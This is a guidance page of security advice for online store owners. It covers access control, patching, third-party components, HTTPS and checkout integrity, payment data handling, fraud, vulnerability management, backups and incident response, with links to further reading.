E-Commerce Security Considerations

Securing your online store and protecting your customers are important and ongoing tasks. Take a look at some steps to consider when setting up and running an online business.

1. Understand you online setup and shared responsibilities

E-commerce can be delivered in different ways (hosted platforms, managed hosting, on-premise, or custom cloud builds). Security responsibilities vary depending on what you outsource, but you remain responsible for managing your business and customers’ data, and ensuring risks are controlled. 

What to do: 

• Map out your service: website/storefront, admin portal, customer accounts, hosting, third party integrations, and payment journey. 

• Document “who patches what” (your team, developer, hosting provider, platform vendor) and keep this up to date. 

• Ensure contracts/support agreements include responsibilities for updates, incident handling, and communications. 

2. Basic cyber hygiene

Basic cyber hygiene helps eliminate the common avenues attackers rely on, such as exploiting known vulnerabilities, weak authentication, and malware. 

What to do: 

• Keep devices, operating systems, apps, and website components up to date and remove anything you no longer use. 

• Use strong, unique passwords; consider three random words or a password manager and avoid re-use across accounts. 

• Use MFA on accounts wherever available, prioritising admin, hosting, email and payment accounts. 

• Use appropriate endpoint protections (e.g. anti-malware) and network protections (e.g. firewalls) where they apply to your environment. 

3. Identity and access management

Identity and access management is fundamental. The “front door” of your online service or store is available to everyone, so access must be controlled and proportionate to risk. 

What to do: 

• Separate admin accounts from day-to-day user accounts, avoid shared admin logins where possible. 

• Apply rules of least privilege and only grant access needed to perform a role.  

• Review access regularly and after role changes. 

• Remove access promptly when staff leave, including contractors and third-party accounts. 

4. Secure design and development

Security should be considered from the outset and implemented by default across the service; from design and implementation to maintenance and effective decommission. 

       Before using a platform or contracting a developer: 

• Research and ask questions – it is important to be confident as to how security is built into the development lifecycle and how fixes are handled. 

• Know the “ins and outs” of systems and services being used. You don’t have to be technical, but visibility and a basic understanding of what components are being used can help to identify problems and threats. 

• Ensure responsibilities for patching, vulnerability management, and incident response are explicit. Fully understand who and what the responsibilities of all parties are. 

5. Common e-commerce website risks

The OWASP Top 10 lists the most critical web application security risks and is a useful reference for store owners and developers. Even if you outsource development, understanding these risks helps you ask better questions and prioritise the right controls. 

High-impact risks: 

• Broken access control: users can access data/actions they shouldn’t. 

• Security misconfiguration: unsafe defaults, exposed services, weak settings. 

• Software supply chain failures: compromised or risky third-party components, plugins, dependencies. 

• Authentication failures: weak login controls, poor session handling. 

• Security logging and alerting failures: you can’t detect/respond quickly. 

6. Supply chain

Most stores rely on extensions/plugins, themes, analytics tags, marketing pixels, chat widgets, and other third-party components, each one can increase the attack surface and risk. 

What to do: 

• Install only what you need and remove unused components. 

• Use reputable sources/vendors and keep components updated. 

• Keep a simple components inventory: component name, source/vendor, purpose, owner, update cadence, and last reviewed date. 

• Restrict who can install/modify components and require MFA for admin actions. 

7. Choose robust and reputable providers

Your providers (platform, hosting, developers, managed services, and payment providers) are part of your overall security. Seek assurance that security is maintained throughout the life of your e-commerce solution, not just at launch. 

Questions to ask suppliers: 

• How often do you perform security assessment/testing and what evidence can you share? 

• What is your patching process and timeframe for critical vulnerabilities? 

• How do you manage third-party dependencies and supply chain risks? 

• What logging/monitoring is available to customers and how are incidents communicated? 

8. Website, transport security, and checkout integrity

TLS (HTTPS) protects data in transit and is essential for pages handling sensitive information (logins, forms, checkout). 

What to do: 

• Use HTTPS across your site, not just checkout, and renew certificates/services before they expire. 

• Treat payment and checkout pages as high risk, implement change control for anything that can alter checkout behaviour (templates, scripts, tags, plugins). 

• If you rely on third-party scripts, ensure they are authorised and monitored for tampering. E-commerce attacks often target scripts running in the browser. 

9. Payment gateway and card data handling

Use reputable payment service providers (PSPs) and design payments so your systems handle as little data as possible. This reduces risk and helps simplify compliance responsibilities. 

What to do: 

• Consider a hosted payment page/redirect or compliant embedded payment solution so payment processing is handled by the provider. 

• Avoid storing card data unless you truly need to. If you must support recurring payments, discuss options with your PSP to reduce sensitive data in your environment. 

• Remember that even when outsourcing payments, your website can still be vulnerable to attack resulting in the compromise of your customers’ financial and personal data, so your own web security remains incredibly important. 

10. Fraud protection and account abuse

Fraud prevention is an important part of running an online business. Reputable platform providers and payment gateways can provide fraud prevention tools and advice. 

What to do: 

• Use the fraud controls provided by your payment gateway (velocity checks, risk scoring, address/identity checks) and ensure they are enabled and configured correctly. 

• Monitor for suspicious behaviour (unusual traffic spikes, repeated failed logins, abnormal purchase patterns). 
• Robust customer account security is a good fraud prevention measure; strong authentication methods and effective monitoring will reduce the chances of account takeover and refund/transaction abuse. 

11. Vulnerability management

Exploiting known vulnerabilities is a common starting point for attacks against online services, so vulnerability management needs an efficient process. 

What to do: 

• Maintain an asset inventory: domains, hosts, application, plugins, integrations. 

• Run vulnerability scanning as part of a broader programme: discovery > detection > triage > remediation > re-scan/verify fixes. 

• For more in-depth guidance on vulnerability management, visit: Guidance - NCSC.GOV.UK 

10. Recovery planning, backups, and incident response

Incidents happen, so plan how you will keep operating, recover quickly. 

Backups: 

• Keep regular, reliable backups and test restores so you know recovery works. 

• Consider the 3-2-1 rule: 3 copies of data, at least 2 different media types, 1 offsite copy. 

• Protect backups from ransomware by ensuring at least one backup is effectively “offline”/digitally disconnected when not in use (especially for cloud backups). 

        Incident response: 

• Have an incident plan that covers containment, roles, communication, and recovery steps. 

• If personal data may be involved, follow a breach assessment and reporting process. 

• Ensure all staff are regularly trained, consider running incident response tabletop exercises. 

• For more in-depth guidance on incident response and management, visit: https://www.ncsc.gov.uk/collection/incident-management 

       Data breach reporting (GDPR expectations): 

• You should have procedures to detect, manage, and record breaches, even if they aren’t reportable. 

• For more in-depth guidance on data protection compliance, visit: Data protection compliance - the basics, Data Protection Law 2018 

Further reading:

• Building and operating a secure online service 

• OWASP Top 10:2025 

• Personal data breaches: a guide | ICO 

• Breach response and monitoring | ICO 

• Vulnerability scanning tools and services - NCSC.GOV.UK 

• Three random words - NCSC.GOV.UK 

• New Information Supplement: Payment Page Security and Preventing E-Skimming 

• Data Backup Options 

• Offline backups in an online world 

• Best practices for event logging and threat detection | Cyber.gov.au 

This page was last updated 04/02/2026